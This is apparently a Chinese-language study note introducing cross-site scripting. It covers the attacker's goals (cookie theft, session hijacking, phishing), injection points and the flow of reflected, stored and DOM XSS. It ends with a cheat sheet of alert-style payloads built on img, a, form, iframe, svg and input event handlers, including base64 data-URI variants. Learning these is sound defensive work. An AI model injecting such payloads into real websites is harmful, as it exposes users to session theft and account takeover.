Day1初识XSS漏洞

1、网络钓鱼，包括获取各类用户账号2、窃取用户cookies资料，从而获取用户隐私信息，或利用用户身份进一步对网站执行操作；3、劫持用户（浏览器）会话，从而执行任意操作，例如非法转账、强制发表日志、电子邮件等4、网页挂马；5、获取客户端信息，如用户的浏览历史、真实p、开放端口等6、强制弹出广告页面、刷流量等7、进行恶意操作，如任意篡改页面信息、删除文章等8、进行大量的客户端攻击，如ddos等9、结合其他漏洞，如csrf，实施进步危害；10、提升用户权限，包括进一步渗透网站11、控制受害者机器向其他网站发起攻击；12、传播跨站脚本蠕虫等

输入用户资料关键词、标签、说明文件上传的地方(如头像等)

Get、Post、cookies、headers等反馈与浏览处富文本编辑器处各类标签插入和自定义处

产生原因:漏洞产生原因一般是网站只是简单地将用户输入的数据直接或未经过完善的安全过滤就在浏览器中进行输岀，导致输岀的欻据中存在可被浏览器执行的代码数据

攻击流程:First:攻击者寻找具有漏洞的网站--->攻击者给用户发了一个带有恶意字符串的链接--->用户点击了该链接--->服务器返回HTML文档，此时该文档已经包含了那个恶意字符串--->客户端执行了植入的恶意脚本，XSS攻击就发生

产生原因:造成漏洞原因一般是由于Web应用程序对用户输入数据的不严格，导致Web应用程序将黑客输入的恶意跨站攻击数据信息保存在服务端的数据库或其他文件形式中。

攻击流程:--->攻击者寻找具有漏洞的网站--->攻击者给用户发了一个带有恶意字符串的链接--->用户点击了该链接--->服务器返回HTML文档，但是该文档此时不包含那个恶意字符串--->客户端执行了该HTML文档里的脚本，然后把恶意脚本植入了页面--->客服端执行了植入的恶意脚本，XSS攻击就发生了

图片加载错误时触发<img src="x" onerror=alert(1)><img src="1" onerror=eval("alert('xss')")>鼠标指针移动到元素时触发<img src=1 onmouseover="alert(1)">鼠标指针移出时触发<img src=1 onmouseout="alert(1)">

<a href="https://www.qq.com">qq</a><a href=javascript:alert('xss')>test</a><a href="javascript:a" onmouseover="alert(/xss/)">aa</a><a href="" onclick=alert('xss')>a</a><a href="" onclick=eval(alert('xss'))>aa</a><a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>

<form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')><form method=post action=aa.asp? onmouseover=prompt('xss')><form method=post action=aa.asp? onmouseover=alert('xss')><form action=1 onmouseover=alert('xss)><form method=post action="data:text/html;base64,<script>alert('xss')</script>"><form method=post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

<iframe onload=alert("xss");></iframe><iframe src=javascript:alert('xss')></iframe><iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe><iframe src="data:text/html;base64,<script>alert('xss')</script>"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><iframe src="aaa" onmouseover=alert('xss') /><iframe><iframe src="javascript&colon;prompt&lpar;``xss``&rpar;"></iframe>(````只有两个``)

<svg onload=alert(1)>

<input onfocus="alert('xss');">竞争焦点，从而触发onblur事件<input onblur=alert("xss") autofocus><input autofocus>通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发<input onfocus="alert('xss');" autofocus><input name="name" value=""><input value="" onclick=alert('xss') type="text"><input name="name" value="" onmouseover=prompt('xss') bad=""><input name="name" value=""><script>alert('xss')</script>按下按键时触发<input type="text" onkeydown="alert(1)">按下按键时触发<input type="text" onkeypress="alert(1)">松开按键式时触发<input type="text" onkeyup="alert(1)">

1、https://www.vulnerability-lab.com/resources/documents/531.txt2、https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations3、https://portswigger.net/web-security/cross-site-scripting/cheat-sheet4、https://cure53.de/fp170.pdf5、https://xss.pwnfunction.com/6、https://www.*******.com/watch?v=5W-zGBKvLxk